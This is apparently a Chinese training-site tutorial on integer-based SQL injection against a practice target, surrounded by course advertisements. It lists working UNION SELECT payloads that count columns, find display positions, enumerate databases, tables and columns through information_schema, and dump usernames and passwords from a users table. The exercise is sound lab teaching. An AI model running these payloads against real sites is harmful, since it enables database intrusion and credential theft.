SQL注入靶機(整形注入實驗)

2019年04月03日 19:43:51 作者:LoadKnight 閱讀數:3503388
網絡安全滲透測試北京實地培訓,五個月華麗蛻變,零元入學,報名聯系:15320004362(手機同微信)。全國誠招招生代理,最低2000元起
第九期開班時間:2021年3月22日

搶先領取全套VIP視頻教程

+10天免費學習名額

  已有8166人參加


視頻課程

姓名 選填

電話


  張*燕188****220722分鐘前

  王*軍186****864498分鐘前

  李*如189****445354分鐘前

>>  稍后老師聯系您發送相關視頻課程  <<



報名CTF挑戰賽,  預約名師指導

  已有 2366 人參加
姓名 選填

電話


  郭*明170****234291分鐘前

  趙*東189****289646分鐘前

  蔡*培135****589722分鐘前





   

網絡安全滲透測試群(必火安全學院):信息安全滲透測試群

護網行動日薪千元(初級中級高級)群:護網行動必火業余班級


首先要判斷是什么類型的注入(由于是整形注入靶機取消這一步)

判斷列數

order by 6 -確定是6列,因為設置超過6頁面報錯

1.png

判斷顯示位

id=-1 union select 1,2,3,4,5,6 id改成一個不存在的值,讓他報錯

2.png

可判斷顯示位為2,3

修改要查詢的內容比如用戶名和數據庫名字

id = -1 union select 1,database(),user(),4,5,6

3.png

查詢所有數據庫的名字(默認保存在information_schema.schemata表中schema_name列)

select * from article where id = -1 union select 1,schema_name,3,4,5,6 from information_schema.schemata

4.png

可以查詢到,但是只顯示了一列,我們需要查詢所有列

所以用group_concat來將其顯示為一列

select * from article where id = -1 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata

5.png

發現了db_baji的數據庫

然后在information_schema.tables這個表中查詢table_name,限制條件是db_baji數據庫

select * from article where id = -1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema="db_baji"

6.png

發現了users

再查詢表中的

select * from article where id = -1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema="db_baji" and table_name="users"

7.png

查到username列 password列 可以查詢具體內容

select * from article where id = -1 union select 1,group_concat(concat_ws(0x23,username,password)),3,4,5,6 from users

8.png

成功!